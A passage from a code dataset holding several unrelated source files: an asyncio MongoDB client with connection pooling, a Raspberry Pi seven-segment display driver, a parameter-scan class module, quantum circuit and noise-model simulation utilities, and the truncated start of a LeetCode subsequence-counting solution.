keys, initial, reduce, condition=None, finalize=None):\n body = {\n \"ns\": self._collection_name,\n \"key\": self._fields_list_to_dict(keys),\n \"initial\": initial,\n \"$reduce\": Code(reduce),\n }\n if condition:\n body[\"cond\"] = condition\n if finalize:\n body[\"finalize\"] = Code(finalize)\n\n return (yield from self._database[\"$cmd\"].find_one({\"group\": body}))\n\n @asyncio.coroutine\n def filemd5(self, spec):\n if not isinstance(spec, ObjectId):\n raise ValueError(_(\"filemd5 expected an objectid for its \"\n \"on-keyword argument\"))\n\n spec = SON([(\"filemd5\", spec),\n (\"root\", self._collection_name)])\n\n result = yield from self._database['$cmd'].find_one(spec)\n return result.get('md5')\n\n @asyncio.coroutine\n def __safe_operation(self, proto, safe=False, ids=None):\n callit = False\n result = None\n if safe is True:\n result = yield from self._database[\"$cmd\"].find_one({\"getlasterror\": 1}, _proto=proto)\n else:\n callit = True\n if ids is not None:\n return ids\n if callit is True:\n return None\n return result\n\n @asyncio.coroutine\n def insert(self, docs, safe=False):\n if isinstance(docs, dict):\n ids = docs.get('_id', ObjectId())\n docs[\"_id\"] = ids\n docs = [docs]\n elif isinstance(docs, list):\n ids = []\n for doc in docs:\n if isinstance(doc, dict):\n id = doc.get('_id', ObjectId())\n ids.append(id)\n doc[\"_id\"] = id\n else:\n raise TypeError(\"insert takes a document or a list of documents\")\n else:\n raise TypeError(\"insert takes a document or a list of documents\")\n proto = self._database._protocol\n proto.OP_INSERT(str(self), docs)\n result = yield from self.__safe_operation(proto, safe, ids)\n return result\n\n @asyncio.coroutine\n def update(self, spec, document, upsert=False, multi=False, safe=False):\n if not isinstance(spec, dict):\n raise TypeError(\"spec must be an instance of dict\")\n if not isinstance(document, dict):\n raise TypeError(\"document must be an instance of dict\")\n if not isinstance(upsert, bool):\n raise TypeError(\"upsert must be an instance of bool\")\n proto = self._database._protocol\n proto.OP_UPDATE(str(self), spec, document, upsert, multi)\n return (yield from self.__safe_operation(proto, safe))\n\n @asyncio.coroutine\n def save(self, doc, safe=False):\n if not isinstance(doc, dict):\n raise TypeError(\"cannot save objects of type %s\" % type(doc))\n\n objid = doc.get(\"_id\")\n if objid:\n return (yield from self.update({\"_id\": objid}, doc, safe=safe, upsert=True))\n else:\n return (yield from self.insert(doc, safe=safe))\n\n @asyncio.coroutine\n def remove(self, spec, safe=False):\n if isinstance(spec, ObjectId):\n spec = SON(dict(_id=spec))\n if not isinstance(spec, dict):\n raise TypeError(\"spec must be an instance of dict, not %s\" % type(spec))\n\n proto = self._database._protocol\n proto.OP_DELETE(str(self), spec)\n return (yield from self.__safe_operation(proto, safe))\n\n @asyncio.coroutine\n def drop(self, safe=False):\n return (yield from self.remove({}, safe))\n\n @asyncio.coroutine\n def create_index(self, sort_fields, **kwargs):\n if not isinstance(sort_fields, _Sort):\n raise TypeError(\"sort_fields must be an instance of filter.sort\")\n if \"name\" not in kwargs:\n name = self._gen_index_name(sort_fields[\"orderby\"])\n else:\n name = kwargs.pop(\"name\")\n\n key = SON()\n for k,v in sort_fields[\"orderby\"]:\n key.update({k:v})\n\n index = SON(dict( ns=str(self), name=name, key=key))\n\n if \"drop_dups\" in kwargs:\n kwargs[\"dropDups\"] = kwargs.pop(\"drop_dups\")\n\n if \"bucket_size\" in 
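The write methods above (`insert`, `update`, `remove`) fire the OP_* message and, only when `safe=True`, chase it with a `getlasterror` command on the same connection so errors surface. A hedged usage sketch against this API — the database and collection names below are placeholders:

```python
import asyncio

@asyncio.coroutine
def demo_writes(conn):
    db = conn.testdb                      # placeholder database name
    # fire-and-forget: returns the generated _id without waiting for an ack
    oid = yield from db.people.insert({"name": "ada"})
    # safe write: a getlasterror round-trip follows on the same connection,
    # so a DuplicateKeyError / OperationFailure would surface here
    yield from db.people.update({"_id": oid}, {"$set": {"name": "ada l."}}, safe=True)
    return (yield from db.people.find_one({"_id": oid}))
```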
kwargs:\n kwargs[\"bucketSize\"] = kwargs.pop(\"bucket_size\")\n \n index.update(kwargs)\n yield from self._database.system.indexes.insert(index, safe=True)\n return name\n\n @asyncio.coroutine\n def ensure_index(self, sort_fields, **kwargs):\n # ensure_index is an alias of create_index since we are not \n # keep an index cache same way pymongo does\n return (yield from self.create_index(sort_fields, **kwargs))\n\n @asyncio.coroutine\n def drop_index(self, index_identifier):\n if isinstance(index_identifier, str):\n name = index_identifier\n elif isinstance(index_identifier, _Sort):\n name = self._gen_index_name(index_identifier[\"orderby\"])\n else:\n raise TypeError(\"index_identifier must be a name or instance of filter.sort\")\n\n cmd = SON([(\"deleteIndexes\", self._collection_name), (\"index\", name)])\n return (yield from self._database[\"$cmd\"].find_one(cmd))\n\n @asyncio.coroutine\n def drop_indexes(self):\n return (yield from self.drop_index(\"*\"))\n\n @asyncio.coroutine\n def index_information(self):\n raw = yield from self._database.system.indexes.find({\"ns\": str(self)})\n info = {}\n for idx in raw:\n info[idx[\"name\"]] = idx[\"key\"].items()\n return info\n\n @asyncio.coroutine\n def rename(self, new_name):\n cmd = SON([(\"renameCollection\", str(self)), (\"to\", \"%s.%s\" % \\\n (str(self._database), new_name))])\n return (yield from self._database(\"admin\")[\"$cmd\"].find_one(cmd))\n\n @asyncio.coroutine\n def distinct(self, key, spec=None):\n cmd = SON([(\"distinct\", self._collection_name), (\"key\", key)])\n if spec:\n cmd[\"query\"] = spec\n\n result = yield from self._database[\"$cmd\"].find_one(cmd)\n if result:\n return result.get(\"values\")\n return {}\n\n @asyncio.coroutine\n def aggregate(self, pipeline, full_response=False):\n \"\"\" not stable yet \"\"\"\n cmd = SON([(\"aggregate\", self._collection_name),\n (\"pipeline\", pipeline)])\n\n result = yield from self._database[\"$cmd\"].find_one(cmd)\n if full_response:\n return result\n return result.get(\"result\")\n\n @asyncio.coroutine\n def map_reduce(self, map, reduce, full_response=False, **kwargs):\n \"\"\" not stable yet \"\"\"\n cmd = SON([(\"mapreduce\", self._collection_name), (\"map\", map), (\"reduce\", reduce)])\n cmd.update(**kwargs)\n result = yield from self._database[\"$cmd\"].find_one(cmd)\n if full_response:\n return result\n return result.get(\"result\")\n\n @asyncio.coroutine\n def find_and_modify(self, query=None, update=None, upsert=False, **kwargs):\n if not update and not kwargs.get('remove', None):\n raise ValueError(\"Must either update or remove\")\n if update and kwargs.get('remove', None):\n raise ValueError(\"Can't do both update and remove\")\n\n cmd = SON([(\"findAndModify\", self._collection_name)])\n cmd.update(kwargs)\n # No need to include empty args\n if query:\n cmd['query'] = query\n if update:\n cmd['update'] = update\n if upsert:\n cmd['upsert'] = upsert\n\n result = yield from self._database[\"$cmd\"].find_one(cmd)\n no_obj_error = \"No matching object found\"\n if not result['ok']:\n if result[\"errmsg\"] == no_obj_error:\n return None\n else:\n raise ValueError(\"Unexpected Error: %s\" % (result,))\n return result.get('value')\n\n\nclass Database(object):\n def __init__(self, protocol, database_name):\n self.__protocol = protocol\n self._database_name = database_name\n\n def __str__(self):\n return self._database_name\n\n def __repr__(self):\n return \"\" % self._database_name\n\n def __call__(self, database_name):\n return Database(self.__protocol, 
database_name)\n\n def __getitem__(self, collection_name):\n return Collection(self, collection_name)\n\n def __getattr__(self, collection_name):\n return self[collection_name]\n\n @property\n def _protocol(self):\n return self.__protocol\n\n @asyncio.coroutine\n def create_collection(self, name, options=None):\n collection = Collection(self, name)\n\n if options:\n if \"size\" in options:\n options[\"size\"] = float(options[\"size\"])\n command = SON({\"create\": name})\n command.update(options)\n result = yield from self[\"$cmd\"].find_one(command)\n if result.get(\"ok\", 0.0):\n return collection\n else:\n raise RuntimeError(result.get(\"errmsg\", \"unknown error\"))\n else:\n return collection\n\n @asyncio.coroutine\n def drop_collection(self, name_or_collection):\n if isinstance(name_or_collection, Collection):\n name = name_or_collection._collection_name\n elif isinstance(name_or_collection, str):\n name = name_or_collection\n else:\n raise TypeError(\"name must be an instance of basestring or txmongo.Collection\")\n\n return self[\"$cmd\"].find_one({\"drop\": name})\n\n @asyncio.coroutine\n def collection_names(self):\n results = yield from self[\"system.namespaces\"].find()\n names = [r[\"name\"] for r in results]\n names = [n[len(str(self)) + 1:] for n in names\n if n.startswith(str(self) + \".\")]\n names = [n for n in names if \"$\" not in n]\n return names\n\n @asyncio.coroutine\n def authenticate(self, name, password):\n \"\"\"\n Send an authentication command for this database.\n mostly stolen from asyncio_mongo._pymongo\n \"\"\"\n if not isinstance(name, str):\n raise TypeError(\"name must be an instance of str\")\n if not isinstance(password, str):\n raise TypeError(\"password must be an instance of str\")\n # First get the nonce\n result = yield from self[\"$cmd\"].find_one({\"getnonce\": 1})\n return (yield from self.authenticate_with_nonce(result, name, password))\n\n @asyncio.coroutine\n def authenticate_with_nonce(self, result, name, password):\n nonce = result['nonce']\n key = auth._auth_key(nonce, name, password)\n # hacky because order matters\n auth_command = SON(authenticate=1)\n auth_command['user'] = name\n auth_command['nonce'] = nonce\n auth_command['key'] = key\n # Now actually authenticate\n result = yield from self[\"$cmd\"].find_one(auth_command)\n return self.authenticated(result)\n\n @asyncio.coroutine\n def authenticated(self, result):\n \"\"\"might want to just call callback with 0.0 instead of errback\"\"\"\n ok = result['ok']\n if ok:\n return ok\n else:\n raise errors.PyMongoError(result['errmsg'])\n\n\nclass Connection(object):\n \"\"\"\n Wrapper around the protocol and transport which takes care of establishing\n the connection and reconnecting it.\n connection = yield from Connection.create(host='localhost', port=6379)\n result = yield from connection.set('key', 'value')\n \"\"\"\n protocol = _Protocol\n \"\"\"\n The :class:`_Protocol` class to be used this connection.\n \"\"\"\n\n @classmethod\n @asyncio.coroutine\n def create(cls, host='localhost', port=27017, loop=None, auto_reconnect=False):\n connection = cls()\n connection.host = host\n connection.port = port\n connection._loop = loop\n connection._retry_interval = .5\n # Create protocol instance\n protocol_factory = type('_Protocol', (cls.protocol,), {})\n if auto_reconnect:\n class protocol_factory(protocol_factory):\n def connection_lost(self, exc):\n super().connection_lost(exc)\n asyncio.Task(connection._reconnect())\n\n connection.protocol = protocol_factory()\n # Connect\n yield from 
connection._reconnect()\n return connection\n\n @asyncio.coroutine\n def disconnect(self):\n if self.transport:\n return self.transport.close()\n\n @property\n def transport(self):\n \"\"\" The transport instance that the protocol is currently using. \"\"\"\n return self.protocol.transport\n\n def _get_retry_interval(self):\n \"\"\" Time to wait for a reconnect in seconds. \"\"\"\n return self._retry_interval\n\n def _reset_retry_interval(self):\n \"\"\" Set the initial retry interval. \"\"\"\n self._retry_interval = .5\n\n def _increase_retry_interval(self):\n \"\"\" When a connection failed. Increase the interval.\"\"\"\n self._retry_interval = min(60, 1.5 * self._retry_interval)\n\n def _reconnect(self):\n \"\"\"\n Set up Mongo connection.\n \"\"\"\n loop = self._loop or asyncio.get_event_loop()\n while True:\n try:\n # print('connecting...')\n yield from loop.create_connection(lambda: self.protocol, self.host, self.port)\n self._reset_retry_interval()\n return\n except OSError:\n # Sleep and try again\n self._increase_retry_interval()\n interval = self._get_retry_interval()\n print('Connecting to mongo failed. Retrying in %i seconds' % interval)\n yield from asyncio.sleep(interval)\n\n def __getitem__(self, database_name):\n return Database(self.protocol, database_name)\n\n def __getattr__(self, database_name):\n return self[database_name]\n\n def __repr__(self):\n return 'Connection(host=%r, port=%r)' % (self.host, self.port)\n\n\n\nclass Pool(object):\n \"\"\"\n Pool of connections. Each Takes care of setting up the connection and connection pooling.\n When pool_size > 1 and some connections are in use because of \n transactions or blocking requests, the other are preferred.\n pool = yield from Pool.create(host='localhost', port=6379, pool_size=10)\n result = yield from connection.set('key', 'value')\n \"\"\"\n\n protocol = _Protocol\n \"\"\" The :class:`_Protocol` class to be used for each connection in this pool. \"\"\"\n\n @classmethod\n def get_connection_class(cls):\n \"\"\" Return the :class:`Connection` class to be used for every connection in\n this pool. Normally this is just a ``Connection`` using the defined ``protocol``\n \"\"\"\n class ConnectionClass(Connection):\n protocol = cls.protocol\n return ConnectionClass\n\n @classmethod\n @asyncio.coroutine\n def create(cls, host='localhost', port=27017, loop=None, poolsize=1, auto_reconnect=True):\n \"\"\" Create a new pool instance. 
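`_reconnect` above retries with a capped geometric backoff: every failure multiplies the wait by 1.5 via `_increase_retry_interval`, saturating at 60 seconds, and a successful connect resets it to 0.5. The wait sequence in isolation:

```python
# mirrors _increase_retry_interval(): interval = min(60, 1.5 * interval)
interval = 0.5
waits = []
while interval < 60:
    interval = min(60, 1.5 * interval)
    waits.append(interval)
print(waits)   # 0.75, 1.125, 1.6875, ... roughly 1.5x per failed attempt, capped at 60
```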
\"\"\"\n self = cls()\n self._host = host\n self._port = port\n self._pool_size = poolsize\n\n # Create connections\n self._connections = []\n\n for i in range(poolsize):\n connection_class = cls.get_connection_class()\n connection = yield from connection_class.create(host=host, port=port, loop=loop,\n auto_reconnect=auto_reconnect)\n self._connections.append(connection)\n\n return self\n\n def __repr__(self):\n return 'Pool(host=%r, port=%r, pool_size=%r)' % (self._host, self._port, self._poolsize)\n\n @property\n def pool_size(self):\n \"\"\" Number of parallel connections in the pool.\"\"\"\n return self._poolsize\n\n @property\n def connections_connected(self):\n \"\"\"\n The amount of open TCP connections.\n \"\"\"\n return sum([1 for c in self._connections if c.protocol.is_connected])\n\n def close(self):\n for conn in self._connections:\n conn.disconnect()\n\n def _get_free_connection(self):\n \"\"\"\n Return the next protocol instance that's not in use.\n (A protocol in pubsub mode or doing a blocking request is considered busy,\n and can't be used for anything else.)\n \"\"\"\n self._shuffle_connections()\n for c in self._connections:\n if c.protocol.is_connected:\n return c\n\n def _shuffle_connections(self):\n \"\"\"\n 'shuffle' protocols. Make sure that we divide the load equally among the protocols.\n \"\"\"\n self._connections = self._connections[1:] + self._connections[:1]\n\n def __getattr__(self, name):\n \"\"\"\n Proxy to a protocol. (This will choose a protocol instance that's not\n busy in a blocking request or transaction.)\n \"\"\"\n if 'close' == name:\n return self.close\n connection = self._get_free_connection()\n\n if connection:\n return getattr(connection, name)\n else:\n raise errors.PyMongoError('No available connections in the pool: size=%s, connected=%s' % \n (self.pool_size, self.connections_connected))\n return None\n\n\n\n@asyncio.coroutine\ndef test():\n from pprint import pprint\n mc = yield from Connection.create(host='127.0.0.1', port=27017)\n doc = yield from mc.local.startup_log.find_one()\n pprint(doc)\n yield from mc.disconnect()\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(test())\n\n\n\n\n","sub_path":"magic3/asyncs/mongoclient.py","file_name":"mongoclient.py","file_ext":"py","file_size_in_byte":32052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"263322648","text":"#! /usr/bin/python\n#\n# sudo python sevenseg_i2c.py -- display number\n# sudo python sevenseg_i2c.py -- display text(very limited)\n# sudo python sevenseg_i2c.py -- count to 200\n#\n# Outputs decimal numbers to AdaFruit LED Backback 7 Segment display\n#\n# i2c must be enabled on the raspberry pi. If you don't see /dev/i2c-1 this\n# code can't work. 
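`_get_free_connection` above load-balances by rotating the connection list one slot per lookup (`_shuffle_connections`) and returning the first connected entry, so successive proxied calls spread across sockets. The rotation step on its own:

```python
conns = ["c0", "c1", "c2"]

def shuffle(lst):
    # same move as Pool._shuffle_connections: rotate left by one
    return lst[1:] + lst[:1]

conns = shuffle(conns)
print(conns)   # ['c1', 'c2', 'c0']
conns = shuffle(conns)
print(conns)   # ['c2', 'c0', 'c1']
```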
\n# Link from your current directory to the following driver files cloned from\n# https://github.com/adafruit/Adafruit-Raspberry-Pi-Python-Code:\n#   Adafruit_I2C.py\n#   Adafruit_7Segment.py\n#   Adafruit_LEDBackpack.py\n\nimport sevenseg\n\nimport sys\nimport time\n\nfrom Adafruit_7Segment import SevenSegment\n\nclass SevenSegDisplay:\n\n    def __init__(self, num_digits=4, address=0x70):\n        self.num_digits = num_digits\n        self.digit = 0\n        self.seg = SevenSegment(address)\n\n    def setup(self):\n        return None\n\n    def cleanup(self):\n        return None\n\n    def start(self):\n        self.digit = 0\n\n    def latch(self):\n        return None\n\n    def send_raw(self, segments):\n        self.seg.writeDigitRaw(self.digit, segments)\n        self.digit += 1\n        # digit 2 is the colon, skip it\n        if self.digit == 2:\n            self.digit += 1\n\n    def output(self, value):\n        \"\"\" Outputs a string or an integer number onto the 7-segment display.\"\"\"\n        raw = sevenseg.text(value, self.num_digits)\n        self.start()\n        for c in raw:\n            self.send_raw(c)\n\n    def blank(self):\n        \"\"\" Blanks the display (all LEDs off). \"\"\"\n        raw = sevenseg.blanks(self.num_digits)\n        self.start()\n        for c in raw:\n            self.send_raw(c)\n\ndef main():\n    \"\"\" Simple test: drive one or more displays \"\"\"\n    args = sys.argv\n\n    if len(args) < 2:\n        # count on the first display\n        display = SevenSegDisplay()\n        display.setup()\n        for num in range(0, 200):\n            display.start()\n            display.output(num)\n            display.latch()\n            time.sleep(0.1)\n        display.cleanup()\n    else:\n        # show values across multiple displays\n        address = 0x70\n        displays = []\n        for value in args[1:]:\n            displays += [SevenSegDisplay(address=address)]\n            address += 1\n        count = 1\n        displays[0].start()\n        for d in displays:\n            d.output(args[count])\n            count += 1\n        displays[0].latch()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"client/sevenseg_i2c.py","file_name":"sevenseg_i2c.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"324839278","text":"#!/usr/bin/env python3\n\nimport sys\nfrom ..format.parameter_type import scalar,matrix\nfrom .generator import generators\nfrom ..color_print import Error\n\nclass independent_scalar(scalar,generators):\n    def __init__(self,name,block,code\n                ,minimum=None,maximum=None,value=None\n                ,strategy='random'\n                ,prior_distribution='uniform'\n                ,**args\n                ):\n        super().__init__(name,block,code,value)\n        self.minimum=minimum\n        self.maximum=maximum\n        self.value=value\n        self.strategy=strategy\n        self.prior_distribution=prior_distribution\n\n        self.check(**args)\n        self.Generate=getattr(self,prior_distribution)\n    def print(self,out=None):\n        if out is None:\n            out=sys.stdout\n        out.write('\\t%s\\t%f\\n'%(self.name,self.value))\n\n    def check(self,**args):\n        if self.strategy=='random':\n            if any([getattr(self,i) is None for i in ('minimum','maximum')]):\n                Error('unknown bounds of parameter %s' % self.name)\n        else:\n            Error('Unknown strategy: %s' % self.strategy)\n\nclass follower(scalar):\n    def __init__(self,name,block,code,target):\n        super().__init__(name,block,code)\n        self.target=target\n    def Generate(self):\n        self.value=self.target.value\n\nclass independent_element(independent_scalar):\n    pass\n\n\nclass independent_matrix(matrix,generators):\n    def __init__(self, name, block, shape = None, value = None, free_element_list=None):\n        super().__init__(name, block, shape, value)\n        self.free_elements={}\n        
self.follower_elements={}","sub_path":"ScanCraft/command/scan/free_parameter.py","file_name":"free_parameter.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"615632408","text":"import numpy as np\nimport tncontract as tn\nimport qutip as qt\nfrom itertools import product\nfrom functools import reduce\n\ndef local_operator(site, local, n_sites):\n \"\"\"\n Simple Local operator function taking a site, the local gate and the number of sites\n \"\"\"\n I = qt.qeye(2)\n width = len(local.dims[0])\n if (site + width > (n_sites)):\n raise ValueError(\"n_sites should be >= site + locality ({} > {})\".format(site+width, n_sites))\n return reduce(qt.tensor, [I for _ in range(site)] + [local] + [I for _ in range(site+width,n_sites)])\n\ndef k_site_paulis(k):\n \"\"\"\n Returns the k-site Pauli operators\n \"\"\"\n paulis = [p/np.sqrt(2) for p in [qt.qeye(2),qt.sigmax(),qt.sigmay(),qt.sigmaz()]]\n r = tuple([range(4) for _ in range(int(k))])\n return [qt.tensor([paulis[i] for i in ranges]) for ranges in product(*r)]\n\ndef ptm_to_super(G):\n \"\"\"\n Converts a PTM to the corresponding superoperator in the computational basis\n \"\"\"\n n = int(np.log2(G.shape[0])/2.)\n paulis = k_site_paulis(n)\n # Pauli change of basis matrix (already normalised)\n T = np.array([p.full().reshape(-1) for p in paulis])\n # check if G is a ket\n if G.shape[1] == 1:\n return np.conj(T.T) @ G\n else:\n return np.conj(T.T) @ G @ T\n\nfrom copy import deepcopy\n\n\"\"\"\nSingle-qubit gates\n\"\"\"\n\n\ndef single_qubit_gate(theta, phi):\n \"\"\"\n Return a single-qubit unitary gate with angles theta and phi.\n \"\"\"\n gate = np.array([\n [np.cos(theta / 2), -1j * np.exp(-1j * phi) * np.sin(theta / 2)],\n [-1j * np.exp(1j * phi) * np.sin(theta / 2), np.cos(theta / 2)]\n ])\n return tn.Tensor(gate.reshape(2, 2, 1, 1), ['physout', 'physin', 'left', 'right'])\n\n\ndef single_qubit_gate_layer(n_sites, angles):\n \"\"\"\n Return an MPO with single-qubit gates along the chain.\n Parameters\n ----------\n n_sites : int\n angles: list\n List of tuples containing the single qubit rotation angles. 
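`ptm_to_super` above is a pure change of basis: `T` stacks the normalised, flattened Paulis row by row, so a Pauli transfer matrix `G` becomes `T† G T` in the computational basis. A quick sanity check, assuming it runs in this module's namespace where `ptm_to_super` is defined: the identity PTM must map to the identity superoperator.

```python
import numpy as np

# The identity channel has PTM = I in the normalised Pauli basis, and a
# unitary basis change must keep it the identity in the computational basis.
G = np.eye(4)                      # single-qubit identity PTM
S = ptm_to_super(G)                # assumed available from this module
assert np.allclose(S, np.eye(4))
```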
Each site\n needs (\\theta_i, \\phi_i).\n \"\"\"\n mpo = [single_qubit_gate(*site_angles) for site_angles in angles]\n return tn.onedim.MatrixProductOperator(mpo)\n\n\ndef random_single_qubit_gate_layer(n_sites):\n \"\"\"\n Return an MPO with random-angled single-qubit gates along the chain.\n Parameters\n ----------\n n_sites : int\n \"\"\"\n angles = [(2 * np.pi * np.random.rand(), 2 * np.pi * np.random.rand()) for _ in range(n_sites)]\n return single_qubit_gate_layer(n_sites, angles)\n\n\ndef random_single_qubit_layer_qutip(n_qubits):\n operators = []\n for n in range(n_qubits):\n operators.append(qt.rand_unitary(2))\n return qt.to_super(qt.tensor(operators))\n\n\n\"\"\"\nTwo-qubit gates\n\"\"\"\n\n\ndef two_qubit_ms_gate(theta):\n \"\"\"\n Return a two-qubit Molmer-Sorenson gate with angle theta.\n \"\"\"\n gate = qt.operations.molmer_sorensen(theta, 2).full()\n\n # Turn the gate into Tensor with physical and virtual bonds.\n gate_tensor = tn.Tensor(gate.reshape(4, 4, 1, 1), ['physout', 'physin', 'left', 'right'])\n\n # Split physical bonds into single-qubit sites.\n gate_tensor.split_index('physout', (2, 2), ['physout_1', 'physout_2'])\n gate_tensor.split_index('physin', (2, 2), ['physin_1', 'physin_2'])\n\n # SVD cut the two-qubit gate into small 2-site MPO.\n U, V = tn.tensor_svd(gate_tensor, row_labels=['physout_1', 'physin_1', 'left'], absorb_singular_values='left')\n U.replace_label(['physout_1', 'physin_1', 'svd_in'], ['physout', 'physin', 'right'])\n V.replace_label(['physout_2', 'physin_2', 'svd_out'], ['physout', 'physin', 'left'])\n return [U, V]\n\ndef two_qubit_gate_layer_qutip(n_sites, thetas, left=0):\n \"\"\"\n Return an MPO with Molmer-Sorenson gates along the chain.\n Parameters\n ----------\n n_sites : int\n thetas: list\n list of MS gate angles\n left : int\n left determines wether the two qubit gates begin from\n qubit 0 or 1. For example, to make ladder circuits\n \"\"\"\n if left != 0 and left != 1:\n raise ValueError(\"left={}. Can only take the value 0 or 1\".format(left))\n\n id = qt.qeye(2)\n gates = [qt.operations.molmer_sorensen(theta) for theta in thetas]\n\n if n_sites % 2 == 0:\n if left == 0:\n return qt.to_super(reduce(qt.tensor, gates))\n else:\n # Pads identities on each end of the chain\n return qt.to_super(reduce(qt.tensor, [id] + gates + [id]))\n else:\n if left == 0:\n # Put an identity tensor at end qubit\n return qt.to_super(reduce(qt.tensor, gates + [id]))\n else:\n # Put an identity tensor on the first qubit.\n return qt.to_super(reduce(qt.tensor, [id] + gates))\n\ndef two_qubit_gate_layer(n_sites, thetas, left=0):\n \"\"\"\n Return an MPO with Molmer-Sorenson gates along the chain.\n Parameters\n ----------\n n_sites : int\n thetas: list\n list of MS gate angles\n left : int\n left determines wether the two qubit gates begin from\n qubit 0 or 1. For example, to make ladder circuits\n \"\"\"\n if left != 0 and left != 1:\n raise ValueError(\"left={}. 
Can only take the value 0 or 1\".format(left))\n\n id_tensor = tn.Tensor(np.eye(2).reshape(2, 2, 1, 1), ['physout', 'physin', 'left', 'right'])\n mpo = []\n for theta in thetas:\n mpo += two_qubit_ms_gate(theta)\n\n if n_sites % 2 == 0:\n if left == 0:\n return tn.onedim.MatrixProductOperator(mpo)\n else:\n # Pads identities on each end of the chain\n return tn.onedim.MatrixProductOperator([id_tensor] + mpo + [id_tensor])\n else:\n if left == 0:\n # Put an identity tensor at end qubit\n return tn.onedim.MatrixProductOperator(mpo + [id_tensor])\n else:\n # Put an identity tensor on the first qubit.\n return tn.onedim.MatrixProductOperator([id_tensor] + mpo)\n\ndef random_two_qubit_gate_layer_qutip(n_sites, left=0):\n \"\"\"\n Return an MPO with random-angled Molmer-Sorenson gates along the chain.\n Parameters\n ----------\n n_sites : int\n left : int\n If n_sites is an odd number, left determines wether the two qubit gates begin from\n qubit 0 (aligned left) or 1 (aligned right).\n \"\"\"\n if n_sites % 2 == 0 and left == 1:\n # This is case where we need to pad identities at the ends of the chain.\n n_gates = int((n_sites - 1) / 2)\n else:\n n_gates = int(np.floor(n_sites / 2))\n thetas = 2 * np.pi * np.random.rand(n_gates)\n return two_qubit_gate_layer_qutip(n_sites, thetas, left=left)\n\ndef random_two_qubit_gate_layer(n_sites, left=0):\n \"\"\"\n Return an MPO with random-angled Molmer-Sorenson gates along the chain.\n Parameters\n ----------\n n_sites : int\n left : int\n If n_sites is an odd number, left determines wether the two qubit gates begin from\n qubit 0 (aligned left) or 1 (aligned right).\n \"\"\"\n if n_sites % 2 == 0 and left == 1:\n # This is case where we need to pad identities at the ends of the chain.\n n_gates = int((n_sites - 1) / 2)\n else:\n n_gates = int(np.floor(n_sites / 2))\n thetas = 2 * np.pi * np.random.rand(n_gates)\n return two_qubit_gate_layer(n_sites, thetas, left=left)\n\ndef random_two_qubit_gate_ladder_qutip(n_sites):\n \"\"\"\n Return a random two-qubit ladder circuit in the form of two MPOs.\n Parameters\n ----------\n n_sites : int\n \"\"\"\n if n_sites <= 2:\n raise ValueError(\"Must have more than 2 qubits to form a ladder circuit (n_sites={}).\".format(n_sites))\n layer_1 = random_two_qubit_gate_layer_qutip(n_sites, left=0)\n layer_2 = random_two_qubit_gate_layer_qutip(n_sites, left=1)\n return layer_1, layer_2\n\ndef random_two_qubit_gate_ladder(n_sites):\n \"\"\"\n Return a random two-qubit ladder circuit in the form of two MPOs.\n Parameters\n ----------\n n_sites : int\n \"\"\"\n if n_sites <= 2:\n raise ValueError(\"Must have more than 2 qubits to form a ladder circuit (n_sites={}).\".format(n_sites))\n layer_1 = random_two_qubit_gate_layer(n_sites, left=0)\n layer_2 = random_two_qubit_gate_layer(n_sites, left=1)\n return layer_1, layer_2\n\n\n\"\"\"\nNoise models\n\"\"\"\n\n\ndef depolarising_channel(p):\n \"\"\"\n Return the superoperator for a depolarising channel.\n \"\"\"\n return qt.kraus_to_super([\n np.sqrt(1 - 3.*p/4.) * qt.qeye(2),\n np.sqrt(p/4.) * qt.sigmax(),\n np.sqrt(p/4.) * qt.sigmay(),\n np.sqrt(p/4.) 
* qt.sigmaz()\n ])\n\n\ndef bit_flip_layer(p, n_sites):\n \"\"\"\n Return a circuit layer where each site experiences a bit-flip error with\n probability p.\n \"\"\"\n x_error = tn.Tensor(\n qt.sigmax().full().reshape(2, 2, 1, 1),\n ['physout', 'physin', 'left', 'right']\n )\n id_tensor = tn.Tensor(\n np.eye(2).reshape(2, 2, 1, 1),\n ['physout', 'physin', 'left', 'right']\n )\n return tn.onedim.MatrixProductOperator(\n [x_error if error_site else id_tensor for error_site in np.random.binomial(1, p, n_sites)]\n )\n\n\n\"\"\"\nOther tools\n\"\"\"\n\n\ndef output_probabilities(psi):\n \"\"\"\n Extract the probabilities for obtaining each output of a quantum circuit.\n \"\"\"\n psi_copy = deepcopy(psi)\n psi_copy.left_canonise(normalise=True)\n psi_vec = tn.onedim.contract_virtual_indices(psi_copy)\n psi_vec.fuse_indices('physout', 'physout')\n probs = abs(psi_vec.data.reshape(-1, 1)) ** 2\n return probs\n","sub_path":"Week1_Trapped_Ions/src/simulation_utils.py","file_name":"simulation_utils.py","file_ext":"py","file_size_in_byte":9566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"553037225","text":"# 115. 不同的子序列\n\n\n# 给定一个字符串 S 和一个字符串 T,计算在 S 的子序列中 T 出现的个数。\n\n# 一个字符串的一个子序列是指,通过删除��些(也可以不删除)字符且不干扰剩余字符相对位置所组成的新字符串。(例如,\"ACE\" 是 \"ABCDE\" 的一个子序列,而 \"AEC\" 不是)\n\n# 示例 1:\n\n# 输入: S = \"rabbbit\", T = \"rabbit\"\n# 输出: 3\n# 解释:\n\n# 如下图所示, 有 3 种可以从 S 中得到 \"rabbit\" 的方案。\n# (上箭头符号 ^ 表示选取的字母)\n\n# rabbbit\n# ^^^^ ^^\n# rabbbit\n# ^^ ^^^^\n# rabbbit\n# ^^^ ^^^\n# 示例 2:\n\n# 输入: S = \"babgbag\", T = \"bag\"\n# 输出: 5\n# 解释:\n\n# 如下图所示, 有 5 种可以从 S 中得到 \"bag\" 的方案。 \n# (上箭头符号 ^ 表示选取的字母)\n\n# babgbag\n# ^^ ^\n# babgbag\n# ^^ ^\n# babgbag\n# ^ ^^\n# babgbag\n# ^ ^^\n# babgbag\n# ^^^\n\n\n\n\n\nclass Solution(object):\n def numDistinct(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: int\n \"\"\"\n \n ways = [0 for _ in xrange(len(t) + 1)]\n ways[0] = 1\n for S_char in s:\n for j, T_char in 